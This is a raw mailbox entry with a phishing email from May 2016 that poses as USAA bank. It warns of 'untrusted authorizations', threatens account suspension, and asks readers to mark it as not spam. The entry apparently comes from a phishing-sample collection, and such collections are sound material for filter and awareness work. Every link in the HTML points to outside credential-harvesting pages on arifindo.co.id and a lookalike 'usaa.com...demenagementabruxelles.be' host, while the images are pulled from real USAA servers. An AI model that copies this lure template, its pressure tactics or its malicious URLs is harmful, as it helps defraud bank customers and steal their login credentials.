From: "USAA" <codewizard@approject.com>
Date: Wed, 04 May 2016 09:31:08 -0700
X-ME-Bayesian: 0.000000
Status: O
X-Status: 
X-Keywords:                  
X-UID: 203

You will not see this in a MIME-aware mail reader.
--===============1600525061==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

  =

   To ensure delivery to your inbox, please add  USAA.Web.Services@customer=
mail.usaa.com to your address book.	  	 =

  =

   	  =

  	 =

    	  =

   Personal Profile Update	 =

     View Accounts |  Privacy Promise |  Contact Us	 =

  	  =

   =

   	  	 =

   	  	 =

   	  	 =

  	  =

    USAA SECURITY ZONE =

 ONLINE =

  MEMBER =

  USAA # ending in: XXXX	 =

  	  =

   	 =

   	 =

   	 =

  	 =

  	 =

   	 =

  	 =

  =

     Special Notice Posted : We've detected several potentialy untrusted au=
thorizations in your account. Most likely an attempt from an unknown locati=
on please update your account now to make it safer. Remember, we only ask y=
ou to update your account in an e-mail.
 Due to system maintenance, all account holders are required to update thei=
r full information =

  =

 Please Note: If your account is not updated now, it result in temporary su=
spension. =

 =

   	   Update My Account	 =

   =

 Some unpleasant mail providers put our messages into spam cause of swindle=
rs phishing activity. Help us to improve your mail provider by clicking "No=
t Spam" on our message and use Mozilla Firefox browser for your safety. =

 =

 Sincerely,
  =

 Gary D. McAlum
 Senior Vice President, =

 Chief Security Officer
 	 	  	 =

  	  	 =

  =

    	 =

  	  	  	 =

   	  	  	  	 =

   	 =

    Please do not reply to this e-mail. To send a secure message to USAA, p=
lease  contact us.
 =

  Privacy Promise
 USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288
  	 =

   	 =

   	   USAA means United Services Automobile Association and its insurance,=
 banking, investment and other companies. Banks Member FDIC. Investments pr=
ovided by USAA Investment Management Company and USAA Financial Advisors In=
c., both registered broker dealers.	  	 =

   	 =

    67624-1212   =

  	 =

     =

  =20
--===============1600525061==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><div id=3D"_aolWebSuiteMsgBody" class=3D"msgBody" >
<div id=3D"AOLMsgPart_0_e5a7d576-01e2-45af-b976-04c8b38ee6b2">
<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"650" bgcol=
or=3D"#b5d7e6">
  <tr>
    <td height=3D"35" valign=3D"center" width=3D"650" align=3D"middle">
    <font style=3D"color: #929292; font-size: 9px" face=3D"Verdana, sans-se=
rif">To =

    ensure delivery to your inbox, please add <span style=3D"color: #68a7c5=
">
    <a href=3D'mailto:USAA.Web.Services@customermail.usaa.com'>USAA.Web.Ser=
vices@customermail.usaa.com</a></span> to your address book.</font></td>
    <td>&nbsp;</td>
  </tr>
</table>
<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"650" bgcol=
or=3D"#b5d7e6">
  <tr>
    <td width=3D"10">&nbsp;</td>
    <td bgcolor=3D"white" width=3D"630" align=3D"middle">
    <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"604">
      <tr>
        <td height=3D"5" colspan=3D"4"></td>
      </tr>
      <tr>
        <td height=3D"45" width=3D"54">
        <a target=3D_blank href=3D"http://arifindo.co.id/images/uau.htm" re=
l=3D"nofollow">
        <img border=3D"0" alt=3D"" src=3D"https://content.usaa.com/mcontent=
/static_assets/Media/email_logo.gif" width=3D"61" height=3D"41"></a></td>
        <td>
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0">
          <tr>
            <td style=3D"font-variant: normal; font-style: normal; font-fam=
ily: Arial, sans-serif; color: #6d6d6d; font-size: 16px; font-weight: bold"=
 height=3D"22" align=3D"left">
            <span style=3D"display: block; margin-top: 9px">Personal Profil=
e =

            Update</span></td>
          </tr>
          <tr>
            <td height=3D"23" nowrap=3D"" align=3D"left">
            <font size=3D"1" face=3D"Verdana, sans-serif">
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            View Accounts</a> |
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            Privacy Promise</a> |
            <a style=3D"color: #6d6d6d; text-decoration: none" target=3D_bl=
ank href=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
            Contact Us</a></font></td>
          </tr>
        </table>
        </td>
        <td height=3D"45" valign=3D"center" width=3D"367" align=3D"right">
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"18=
8" height=3D"65">
          <tr>
            <td width=3D"22">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=
=3D"22" height=3D"65">
              <tr>
                <td style=3D"line-height: 0" height=3D"29" valign=3D"top" w=
idth=3D"8">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-1.gif" wi=
dth=3D"8" height=3D"29"></td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
29" valign=3D"top" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-2.gif" wi=
dth=3D"14" height=3D"29"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" height=3D"29" valign=3D"top" w=
idth=3D"8">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif"=
 width=3D"8" height=3D"29"></td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
29" valign=3D"top" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif"=
 width=3D"14" height=3D"29"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" height=3D"7" valign=3D"bottom"=
 width=3D"8">
                </td>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"bottom" width=3D"14">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-1.gif" wi=
dth=3D"14" height=3D"7"></td>
              </tr>
            </table>
            </td>
            <td bgcolor=3D"#e7e7e8" align=3D"left">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"5" width=
=3D"100%" height=3D"65">
              <tr>
                <td style=3D"text-align: left; line-height: 12px; font-size=
: 9px" valign=3D"center" align=3D"left">
                <font style=3D"color: rgb(0,54,91); font-size: 10px" face=
=3D"Arial, Helvetica, sans-serif">
                <strong>USAA SECURITY ZONE</strong></font> <br>
                <font color=3D"#00365b" face=3D"Arial, Helvetica, sans-seri=
f">ONLINE</font>
                <br>
                <font style=3D"color: rgb(0,54,91); font-size: 9px" face=3D=
"Arial, Helvetica, sans-serif">
                MEMBER</font> <br>
                <font style=3D"color: rgb(0,54,91); font-size: 9px" face=3D=
"Arial, Helvetica, sans-serif">
                USAA # ending in: XXXX</font></td>
              </tr>
            </table>
            </td>
            <td bgcolor=3D"#ffffff" width=3D"7">
            <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=
=3D"7" height=3D"65">
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"top" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_1-3.gif" wi=
dth=3D"7" height=3D"7"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
51" valign=3D"top" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_spacer.gif"=
 width=3D"7" height=3D"51"></td>
              </tr>
              <tr>
                <td style=3D"line-height: 0" bgcolor=3D"#e7e7e8" height=3D"=
7" valign=3D"bottom" width=3D"7" align=3D"right">
                <img style=3D"display: block" border=3D"0" alt=3D"" src=3D"=
https://content.usaa.com/mcontent/static_assets/Media/email_sec_2-2.gif" wi=
dth=3D"7" height=3D"7"></td>
              </tr>
            </table>
            </td>
          </tr>
        </table>
        </td>
      </tr>
      <tr>
        <td height=3D"20" colspan=3D"4">&nbsp;</td>
      </tr>
      <tr>
        <td height=3D"1" colspan=3D"4"></td>
      </tr>
    </table>
    <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" width=3D"95%">
      <tr>
        <td width=3D"95%" align=3D"left">
        <font style=3D"line-height: 18px; color: #333333; font-size: 12px" =
face=3D"Verdana, sans-serif">
        <font style=3D"line-height: 18px; color: rgb(51,51,51); font-size: =
12px" face=3D"Verdana, sans-serif">
        Special Notice Posted :
        <p class=3D"aolmail_first"><span class=3D"aolmail_bold">We've</span=
>  detected several potentialy untrusted authorizations in your account.
Most likely an attempt from an unknown location please update your account =
now to make it safer.
        Remember, we only ask you to update your account =

        in an e-mail.</p>
        <p>Due to system maintenance, all account holders are required to u=
pdate =

        their full information </p>
        <ul>

        </ul>
        <p><strong>Please Note:</strong> If your account is not updated now=
, it =

        result in temporary suspension. =

        </p>
        <table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" bgcolor=3D"=
#6cae35" height=3D"15">
          <tr bgcolor=3D"#6cae35">
            <td bgcolor=3D"#6cae35" valign=3D"center" width=3D"15" align=3D=
"middle">
            <img src=3D"https://content.usaa.com/mcontent/static_assets/Med=
ia/email_cta_arrow.gif" width=3D"15" height=3D"15"></td>
            <td bgcolor=3D"#6cae35" valign=3D"center" width=3D"134" align=
=3D"middle">
            <a style=3D"font-variant: normal; font-style: normal; font-fami=
ly: arial, sans-serif; color: rgb(255,255,255); font-size: 11px; font-weigh=
t: bold; text-decoration: none" target=3D_blank href=3D"http://usaa.com.sav=
ings.account.online.access-checking.demenagementabruxelles.be/USAA.htm">
            Update My Account</a></td>
          </tr>
        </table>
        </font>  =

        <p><br>
Some unpleasant mail providers put our messages into spam cause of swindler=
s phishing activity.
Help us to improve your mail provider by clicking "Not Spam" on our message=
 and use Mozilla Firefox browser for your safety.                   =

<br>
<br>
Sincerely,<br>

<img src=3D"https://content.usaa.com/mcontent/static_assets/om/Media/CD5241=
_lres.jpg" width=3D"197" height=3D"53" id=3D"yui_3_16_0_1_1399663152274_100=
22"> <br>


Gary D. McAlum<br>
Senior Vice President, <br>
Chief Security Officer</font></font></p>                       =

        <img border=3D"0" alt=3D"" src=3D"https://trustsealinfo.websecurity=
.norton.com/images/vseal.gif" width=3D"100" height=3D"58"></a></td>        =
  =

		</td>
<td id=3D"yui_3_16_0_1_1399663152274_30548">&nbsp;</td>
        <br>
        &nbsp;</font></td>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td height=3D"30" colspan=3D"2" align=3D"left"><br>
        <a target=3D_blank href=3D"http://arifindo.co.id/images/uau.htm" re=
l=3D"nofollow">
        <img border=3D"0" alt=3D"Facebook" src=3D"http://content.usaa.com/m=
content/static_assets/om/Media/thumbnails/facebookIcon.gif" width=3D"32" he=
ight=3D"32"></a>&nbsp;&nbsp;<a target=3D_blank href=3D"http://arifindo.co.i=
d/images/uau.htm" rel=3D"nofollow"><img border=3D"0" alt=3D"Twitter" src=3D=
"http://content.usaa.com/mcontent/static_assets/om/Media/thumbnails/twitter=
Icon.gif" width=3D"32" height=3D"32"></a></td>
      </tr>
    </table>
    </td>
    <td width=3D"5">&nbsp;</td>
    <td width=3D"5">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"5" width=3D"10">&nbsp;</td>
    <td height=3D"5" width=3D"630">&nbsp;</td>
    <td height=3D"5" width=3D"5">&nbsp;</td>
    <td height=3D"5" width=3D"5">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"20" colspan=3D"4">&nbsp;</td>
  </tr>
  <tr>
    <td colspan=3D"4" align=3D"middle">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    Please do not reply to this e-mail. To send a secure message to USAA, p=
lease
    <a style=3D"color: #408cb0; text-decoration: none" target=3D_blank href=
=3D"http://arifindo.co.id/images/uau.htm" rel=3D"nofollow">
    contact us</a>.<br>
    <br>
    <a style=3D"color: #6d6d6d" target=3D_blank href=3D"http://arifindo.co.=
id/images/uau.htm" rel=3D"nofollow">
    Privacy Promise</a><br>
    USAA, 9800 Fredericksburg Road, San Antonio, Texas 78288<br>
    &nbsp;</font></td>
  </tr>
  <tr>
    <td height=3D"15" width=3D"10">&nbsp;</td>
  </tr>
  <tr>
    <td width=3D"5" align=3D"left">&nbsp;</td>
    <td width=3D"630" colspan=3D"2" align=3D"left">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    USAA means United Services Automobile Association and its insurance, =

    banking, investment and other companies. Banks Member FDIC. Investments =

    provided by USAA Investment Management Company and USAA Financial Advis=
ors =

    Inc., both registered broker dealers.</font></td>
    <td width=3D"5" align=3D"left">&nbsp;</td>
  </tr>
  <tr>
    <td height=3D"15" width=3D"10">&nbsp;</td>
  </tr>
  <tr>
    <td colspan=3D"4" align=3D"right">
    <font style=3D"line-height: 18px; color: #6d6d6d; font-size: 10px" face=
=3D"Verdana, sans-serif">
    67624-1212&nbsp;&nbsp;&nbsp;</font><br>
    &nbsp;</td>
  </tr>
</table>

</div>
</div>
	=

<!-- End msgReadForm -->
</td></tr>
</table>

	=





</body>
</html></html>
--===============1600525061==--


From jose@monkey.org Fri May  6 16:58:14 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 71485225308.03.shoes20_817ced318843f
X-Spam-Summary: 2,0,0,1d2748b377913ed5,d41d8cd98f00b204,codewizard@approject.com,:codewizard@approject.com,RULES_HIT:41:327:355:379:581:871:988:989:1260:1261:1313:1314:1345:1381:1516:1518:1525:1536:1569:1575:1594:1711:1714:1730:1747:1764:1777:1792:2393:2540:2559:2562:2917:3138:3139:3140:3141:3142:3876:3877:5007:6114:6264:6642:6687:6748:7281:7398:7809:9898:10004:10394:10400:11604:11658:11914:12196:12340:12561:13110:13439:21080:21326,0,RBL:191.53.232.23:@approject.com:.lbl8.mailshell.net-62.8.255.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:11,LUA_SUMMARY:none
X-HE-Tag: shoes20_817ced318843f
X-Filterd-Recvd-Size: 32892
Received: from MGF-IBM2.SAAE.UNAI (unknown [191.53.232.23])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Fri,  6 May 2016 16:58:09 +0000 (UTC)
Received: from MGF-IBM2.SAAE.UNAI ([127.0.0.1]) by MGF-IBM2.SAAE.UNAI with Microsoft SMTPSVC(8.0.9200.16384);
	 Fri, 6 May 2016 13:18:52 -0300
Content-Type: multipart/mixed; boundary="===============1808104563=="
MIME-Version: 1.0
Subject: Your USAA Checking/Savings Account Untrusted Authorization
To: Recipients <codewizard@approject.com>
